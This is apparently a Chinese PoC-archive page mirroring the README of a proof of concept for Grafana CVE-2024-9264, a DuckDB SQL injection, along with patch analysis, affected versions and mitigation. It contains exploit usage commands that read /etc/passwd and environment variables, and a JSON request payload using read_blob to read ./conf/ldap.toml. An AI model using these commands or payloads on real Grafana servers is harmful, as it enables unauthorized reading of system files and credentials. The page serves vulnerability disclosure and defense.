POC详情: 44713644cd4a449a669b3d4d8b21ab51b5939c3b

来源
关联漏洞
标题: Grafana 安全漏洞 (CVE-2024-9264)
描述:Grafana是Grafana开源的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana存在安全漏洞,该漏洞源于SQL表达式实验性功能在处理用户输入的duckdb查询时,未能充分清理,导致命令注入和本地文件包含漏洞。
描述
Exploit for Grafana arbitrary file-read (CVE-2024-9264)
介绍
# CVE-2024-9264  
## Grafana Post-Auth DuckDB SQL Injection (File Read)

### Proof of Concept (PoC)

This PoC demonstrates the exploitation of CVE-2024-9264 using an authenticated user to perform a DuckDB SQL query and read an arbitrary file on the filesystem.

**Setup:**
Install the required dependencies via:
```bash
pip install -r requirements.txt
```

**Usage (File Read Example):**
```bash
python3 CVE-2024-9264.py -u user -p pass  -f /etc/passwd  http://localhost:3000
```

You can also execute arbitrary DuckDB queries, such as calling `getenv` to retrieve environment variables:
```bash
python3 CVE-2024-9264.py -u user -p pass -q "SELECT getenv('PATH')" http://localhost:3000
```

The list of utility DuckDB functions that can be exploited can be found [here](https://duckdb.org/docs/sql/functions/utility).

### Vulnerability Overview

[CVE-2024-9264](https://grafana.com/security/security-advisories/cve-2024-9264) is a DuckDB SQL injection vulnerability in Grafana's experimental SQL Expressions feature. Any authenticated user can execute arbitrary DuckDB SQL queries through modified expressions in Grafana dashboards.

**Affected Versions:**
- Grafana OSS and Enterprise versions 11.0.0 - 11.0.5, 11.1.0 - 11.1.6, and 11.2.0 - 11.2.1.

**Patched Versions:**
- 11.0.5+security-01 and higher

### Finding the Patch

Grafana released special versions to fix this vulnerability. To analyze the patch, the following commands can be used to compare the changes:

```bash
git checkout v11.0.5+security-01
git diff 0421a8911cfc05a46c516fd9d033a51e52e51afe 70316b3e1418c9054017047e63c1c96abb26f495
```

This reveals that the SQL Expressions feature was simply removed from the vulnerable versions.

```diff
+++ b/pkg/expr/sql/db.go
@@ -0,0 +1,26 @@
+package sql
+
+import (
+       "errors"
+
+       "github.com/grafana/grafana-plugin-sdk-go/data"
+)
+
+type DB struct {
+}
+
+func (db *DB) TablesList(rawSQL string) ([]string, error) {
+       return nil, errors.New("not implemented")
+}
+
+func (db *DB) RunCommands(commands []string) (string, error) {
+       return "", errors.New("not implemented")
+}
+
+func (db *DB) QueryFramesInto(name string, query string, frames []*data.Frame, f *data.Frame) error {
+       return errors.New("not implemented")
+}
+
+func NewInMemoryDB() *DB {
+       return &DB{}
+}
```

```diff
@@ -85,7 +84,7 @@ func (gr *SQLCommand) Execute(ctx context.Context, now time.Time, vars mathexp.V
 
        rsp := mathexp.Results{}
 
-       duckDB := duck.NewInMemoryDB()
+       duckDB := sql.NewInMemoryDB()
        var frame = &data.Frame{}
        err := duckDB.QueryFramesInto(gr.refID, gr.query, allFrames, frame);
        if err != nil {
```

The patch removes SQL Expressions entirely, preventing the possibility of exploitation.

### Exploiting the Vulnerability

1. **Launch Grafana**:
   Run Grafana with version 11.0.5:
   ```bash
   docker run --name=grafana -p 3000:3000 grafana/grafana-enterprise:11.0.5
   ```

2. **Modify an Expression**:
   Create a dashboard with an expression like "Math", intercept the request with Burp, and modify the `datasource` type from `math` to `sql`.

   A HTTP request will be sent to `/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101`.

   Below is the minimal JSON required to perform a DuckDB SQL query to read an arbitrary file like `./conf/ldap.toml`:
   ```json
   {
     "queries": [
       {
         "refId": "B",
         "datasource": {
           "type": "__expr__",
           "uid": "__expr__",
           "name": "Expression"
         },
         "type": "sql",
         "hide": false,
         "expression": "SELECT content FROM read_blob(\"./conf/ldap.toml\")",
         "window": ""
       }
     ],
     "from": "1729313027261",
     "to": "1729334627261"
   }
   ```
No dashboard needs to present for the actual exploitation, it's just an easy way to find the HTTP request to execute a query.

### Likelihood of Exploitability

It's important to note that while this vulnerability is critical, its exploitability depends on whether the DuckDB binary is installed on the Grafana server. **By default, Grafana does not ship with DuckDB installed**, and there is no option to install it directly from the Grafana interface. 

**For this vulnerability to be exploitable, an administrator must have manually installed DuckDB and added it to the Grafana server's `$PATH`.** If DuckDB is not present, the SQL injection vulnerability cannot be leveraged, significantly reducing the likelihood of successful exploitation in default installations.

### Mitigation

Update Grafana to patched versions, and ensure that the DuckDB binary is not present in the `$PATH` if patching is delayed.

### Credits

This PoC uses the [ten](https://github.com/cfreal/ten) framework developed by [cfreal](https://github.com/cfreal).
文件快照

[4.0K] /data/pocs/44713644cd4a449a669b3d4d8b21ab51b5939c3b ├── [3.8K] CVE-2024-9264.py ├── [4.7K] README.md └── [ 20] requirements.txt 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。